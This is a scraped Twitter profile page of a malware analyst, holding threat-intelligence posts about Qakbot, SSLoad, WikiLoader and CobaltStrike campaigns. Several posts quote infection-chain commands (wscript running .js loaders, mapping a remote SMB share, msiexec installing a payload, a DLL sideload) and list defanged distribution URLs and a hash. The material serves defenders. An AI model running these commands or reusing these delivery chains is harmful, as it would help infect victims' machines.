ExecuteMalware(@executemalware) 's Twitter Profileg
ExecuteMalware

@executemalware

#malware hunter & analyst.
Opinions are my own.

ID:743883460587167744

calendar_today17-06-2016 19:10:12

15,5K Tweets

25,8K Followers

190 Following

Threat Insight(@threatinsight) 's Twitter Profile Photo

Researchers at Proofpoint and TEAM CYMRU - S2 Threat Research Team predict Latrodectus, a new malware used by initial access brokers (IABs), will continue gaining momentum among threat actors due to its ability to evade sandbox detection.

Dark Reading has the details: ow.ly/o2oQ50RbEPu.

account_circle
ANY.RUN(@anyrun_app) 's Twitter Profile Photo

💻 Ever wondered how cyber threats disguise themselves to avoid detection? 

In this article, we explore the intricate techniques of obfuscators such as .NET Reactor and . Get ready to explore deobfuscation techniques and create own tools 👇

any.run/cybersecurity-…

account_circle
Matthew Mesa(@mesa_matt) 's Twitter Profile Photo

Be alert that there is Qakbot being spread in the wild:
49220571574da61781de37f35c66e8f0dadb18fdedb6d3a1be67485069cfd4b0

Campaign: tchk08

ITW URLs on Virustotal:
upd5[.]pro
upd112.appspot[.]com

account_circle
Cryptolaemus(@Cryptolaemus1) 's Twitter Profile Photo

- - url > .js > smb > .msi

wscript.exe Doc_m42_81h118103-88o62135w8623-1999q9.js

net use A: \\krd6.]com@80\share\ /persistent:no

msiexec.exe /I avp.msi

msiexec.exe /V

(1/3) 👇

IOC's
github.com/pr0xylife/SSLo…

#SSLoad - #TA578 - url > .js > smb > .msi wscript.exe Doc_m42_81h118103-88o62135w8623-1999q9.js net use A: \\krd6.]com@80\share\ /persistent:no msiexec.exe /I avp.msi msiexec.exe /V (1/3) 👇 IOC's github.com/pr0xylife/SSLo…
account_circle
Cryptolaemus(@Cryptolaemus1) 's Twitter Profile Photo

- - .pdf > url > .zip > .js > .js > .dll

wscript Invoice_818493.js

wscript out.js

C:\Users\Admin\AppData\Local\Temp\npp.8.6.4.portable.x64\notepad.exe (sideload)👇

\npp.8.6.3.portable.x64\plugins\mimeTools.dll

(1/3) 👇

IOC's
github.com/pr0xylife/Wiki…

#WikiLoader - #TA544 - .pdf > url > .zip > .js > .js > .dll wscript Invoice_818493.js wscript out.js C:\Users\Admin\AppData\Local\Temp\npp.8.6.4.portable.x64\notepad.exe (sideload)👇 \npp.8.6.3.portable.x64\plugins\mimeTools.dll (1/3) 👇 IOC's github.com/pr0xylife/Wiki…
account_circle
ExecuteMalware(@executemalware) 's Twitter Profile Photo

Here are some IOCs from a sample that was analyzed on Friday. It seems to be but I could be mistaken.
github.com/executemalware…

Here are some IOCs from a sample that was analyzed on Friday. It seems to be #xloader #formbook but I could be mistaken. github.com/executemalware…
account_circle
Cryptolaemus(@Cryptolaemus1) 's Twitter Profile Photo

distro 👇
https://proactivesolutionsmc.]com/fossil/joggling/?a=x
https://recruitment-filetransfertools.]com/?a=x
https://recruitment-filetransfertools.]com/save.php

https://felizcity.]com/wp-content/plugins/jetpack/json-endpoints/jetpack/Hays_compiled_documents.zip

account_circle
Cryptolaemus(@Cryptolaemus1) 's Twitter Profile Photo

- url > .zip > .js > CobaltStrike

Interesting campaign this week purporting to be Hays Recruitment.

DocuSign lure that leads to a site that drops a zip file that contains a .js loader for

(1/3)👇IOC's continued

#ISFB #LDR4 - url > .zip > .js > CobaltStrike Interesting campaign this week purporting to be Hays Recruitment. DocuSign lure that leads to a site that drops a zip file that contains a .js loader for #CobaltStrike (1/3)👇IOC's continued
account_circle
Josh Stroschein | The Cyber Yeti(@jstrosch) 's Twitter Profile Photo

🚨 In this video, we'll explore memory dumps from @hatching_io/Triage sandbox and find stealer unpacked, then use hasherezade's to fix section alignment to analyze w/ and identify config data 👇

⚒️ youtu.be/X0gpApgyS1E

account_circle
RussianPanda 🐼 🇺🇦(@RussianPanda9xx) 's Twitter Profile Photo

We are seeing being delivered v ia now. I suspect that FakeBat is purchased by threat actors behind ClearFake. We have seen them using Hijack Loader/IDAT Loader before for FakeBat post-infection 🤔

account_circle
0verfl0w(@0verfl0w_) 's Twitter Profile Photo

Our latest post has just gone live! In this one, we're looking at using Capstone Disassembler, Unicorn Emulation Framework, and Python to defeat encrypted stack strings within a Conti ransomware sample

0ffset.net/reverse-engine…

account_circle
Tommy M (TheAnalyst)(@ffforward) 's Twitter Profile Photo

New blog out on and out. This isn't really a deep dive, but it's important to get blogs out in shorter time to the community too, in addition to the deep dives.
The actor has continued with almost daily similar campaigns since March 26th.

account_circle
LaurieWired(@lauriewired) 's Twitter Profile Photo

Do you enjoy solving programming puzzles? Want to uncover what a malicious attacker is actually trying to do with their code?

Check out my latest video, where we manually deobfuscate and Reverse Engineer an obfuscated JavaScript file!

youtu.be/2iBqqPmUYfE

account_circle